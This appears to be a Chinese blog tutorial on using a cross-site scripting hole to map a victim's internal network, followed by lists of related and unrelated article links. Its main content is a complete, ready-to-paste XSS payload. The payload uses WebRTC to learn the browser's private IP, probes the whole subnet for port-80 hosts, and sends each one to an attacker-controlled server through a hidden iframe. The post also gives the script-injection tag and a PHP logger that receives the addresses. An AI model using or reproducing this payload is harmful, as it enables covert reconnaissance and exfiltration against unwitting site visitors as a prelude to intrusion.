前提得浏览器支持webRTC,测试的时候google浏览器测试成功,火狐浏览器不支持webRTC,

再在xss平台直接复制如下js代码:

 function form_ip(ip,port){

     var iframe = document.createElement("iframe");                //通过iframe将可访问的内网ip传给服务器。

     iframe.setAttribute("src","http://192.168.155.2/rev.php?ip=" + ip + "&port=" + port);//这里是服务器的ip

     iframe.setAttribute("style","display:none")

     var TagName = document.getElementsByTagName("body")[0];

     TagName.appendChild(iframe);

 }

 function getIPs(callback){

     var ip_dups = {};

     var RTCPeerConnection = window.RTCPeerConnection

         || window.mozRTCPeerConnection

         || window.webkitRTCPeerConnection;

     var mediaConstraints = {

         optional: [{RtpDataChannels: true}]

     };

     var servers = undefined;

     if(window.webkitRTCPeerConnection)

         servers = {iceServers: []};

     var pc = new RTCPeerConnection(servers, mediaConstraints);

     pc.onicecandidate = function(ice){

         if(ice.candidate){

             var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/

             var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];

             if(ip_dups[ip_addr] === undefined)

                 callback(ip_addr);

             ip_dups[ip_addr] = true;

         }

     };

     pc.createDataChannel("");

     pc.createOffer(function(result){

         pc.setLocalDescription(result, function(){});

     }, function(){});

 }//通过weprtc获取内网ip

 getIPs(function(ip){

     ip = ip.split(".");

     ip.pop();

     ip = ip.join(".");

     for(var i = 1;i<=255;i++){

         var script = document.createElement("script");

         var ip_url = ip + "." + i + ":80";

         script.setAttribute("src","http://" + ip_url);

         script.setAttribute("onload","form_ip('" + ip + "." + i + "','80')");//通过遍历,如果内网的ip有80端口服务,执行form_ip函数

         var TagName = document.getElementsByTagName("body")[0];

         TagName.appendChild(script);

     }

 });
我们可以在有xss注入的地方插入:<script src="http://xss平台的地址"></script>
在谷歌浏览器看控制台信息,已经将内网ip发送给服务器了。

http://192.168.155.2这里是我服务器的ip.
服务器接受的代码是:
 <?php

 $ip=$_REQUEST['ip'];

 $port=$_REQUEST['port'];

 $myfile=fopen("ip.txt","a");

 fwrite($myfile,$ip.':'.$port.'   ');

 fclose($myfile);

 ?>

下面是服务器接受到的ip:

接下来就是可以内网渗透了。

												


											
xss实现获取内网ip的更多相关文章
	

    
								
  1. 通过js获取内网ip和外网ip的简单方法 ...
		
    今天遇到了一个需求,需要获取用户当前的内网ip, 找了半天终于找到了方法,遂将找到的方法记录下来,留给需要的人. 1,获取内网ip function getIP(callback) { let rec ...
    
		
    2. 
						
  2. JAVA  优先获取外网Ip,再获取内网Ip
		
    1.获取内网Ip private String getLocalhostIp(){ String hostAddress = ""; try { InetAddress addre ...
    
		
    3. 
						
  3. Python获取内网IP
		
    Python 获取本机内网IP 本文记录使用Python获取本机IP的两种方法. 通过hostname来获取本机IP import socket print(socket.gethostbyname( ...
    
		
    4. 
						
  4. ngrok反向隧道--获取内网IP
		
    ngrok反向隧道 前情提要:小明与小白各有一台主机,两台主机在同一内网,小明想直接通过内网ssh到小白的主机上.但是小白的ip地址会不断的变化,而小明不想每次都要麻烦小白查看ip.于是小明催生了一个 ...
    
		
    5. 
						
  5. (转)js获取内网ip地址,操作系统,浏览器版本等信息
		
    这次呢,说一下使用js获取用户电脑的ip信息,刚开始只是想获取用户ip,后来就顺带着获取了操作系统和浏览器信息. 先说下获取用户ip地址,包括像ipv4,ipv6,掩码等内容,但是大部分都要根据浏览器 ...
    
		
    6. 
						
  6. 获取本机外网ip和内网ip
		
    获取本机外网ip //获取本机的公网IP public static string GetIP() { string tempip = ""; try { WebRequest r ...
    
		
    7. 
						
  7. js获取设备内网ip
		
    可以直接使用,不需要导入其他配置 看代码 1 <script> 2 //获取内网ip 3 var RTCPeerConnection = window.RTCPeerConnection  ...
    
		
    8. 
						
  8. 根据Request获取客户端IP 内网IP及外网IP
		
    在JSP里,获取客户端的IP地址的方法是:request.getRemoteAddr() ,这种方法在大部分情况下都是有效的.但是在通过了Apache,Squid等反向代理软件就不能获取到客户端的真实 ...
    
		
    9. 
						
  9. C#获取内网和外网IP
		
    写了个小客户端,里面用到了获取内网和外网的IP地址,代码如下: // InnerIP var ipHost = Dns.Resolve(Dns.GetHostName()); ]; innerIP = ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. I/O处理小练习--保存用户账号密码
			
    I/O处理小练习--保存用户账号密码 用户输入姓名和密码,将每一个姓名和密码保存到文件中,输入done时程序结束 import java.io.*; public class Example { pu ...
    
			
    2. 
						
  2. MVC 中使用kindEditor 图片上传在IE 上进行上传出现的问题
			
    在IE 上使用KindEditor 进行单张图片上传的时候会出现一个下载安全警告,这样将会造成图片上传失败,出现的错误页面:
    
			
    3. 
						
  3. Java:类加载器(ClassLoader)
			
    听上去很高端,其实一般自定义类加载器不需要用户去实现解析的过程,只要负责实现获取类对应的.class字节流部分就ok了,摘录深入理解Java虚拟机的一段话 虚拟机设计团队把类加载阶段中的“通过一个类的 ...
    
			
    4. 
						
  4. vs2015 xamarin 添加智能感知
			
    下载 由于未安装 Xamarin Studio, 不存在android-layout-xml.xsd . schemas.android.com.apk.res.android.xsd 文件. 所以在 ...
    
			
    5. 
						
  5. angular开发中的两大问题
			
    一.在我们的angular开发中,会请求数据但轮播图等...在请求过数据后他的事件和方法将不再执行: 看我们的解决方案一: app.controller("text",functi ...
    
			
    6. 
						
  6. vmware 虚拟机导入OVF出现路径错误
			
    现状: 需要将原有数据中心的VM虚拟机导出本地OVF模板,然后迁移至新的机房虚拟化环境后从新导入. 问题: 导入OVF时候,先出现错误问题1,修复完成后,出现错误问题2 1. OVF迁移至本地以后,导 ...
    
			
    7. 
						
  7. 在Oracle/SQL Service中通过Function返回Table
			
    本函数用途:返回一个Table 在Oracle中实现,范例: --在Types中: create or replace type objTable as object ( s_usercode var ...
    
			
    8. 
						
  8. HW—词频统计
			
    第一次个人作业——词频统计 第一次做这种大作业,明显感觉陌生,各种规范和技能也是第一次使用,希望自己好运. 目录:一.基本要求 二.需求分析及时间估计 三.实现思路及过程 四.测试用例.时间性能分析及 ...
    
			
    9. 
						
  9. MVC中异常: An exception of type 'System.Data.ProviderIncompatibleException' occurred in EntityFramework.dll的一种解决办法
			
    今天在调试MVC的例子的时候,总是出错(An exception of type 'System.Data.ProviderIncompatibleException' occurred in Ent ...
    
			
    10. 
						
  10. Visual studio 2015已经停止工作无限重启
			
    今天遇到一个问题,某个文件在撤销的时候vs报错,然后提示到路径 “C:\Users\username\AppData\Roaming\Microsoft\VisualStudio\14.0\***.x ...
    
			
    11.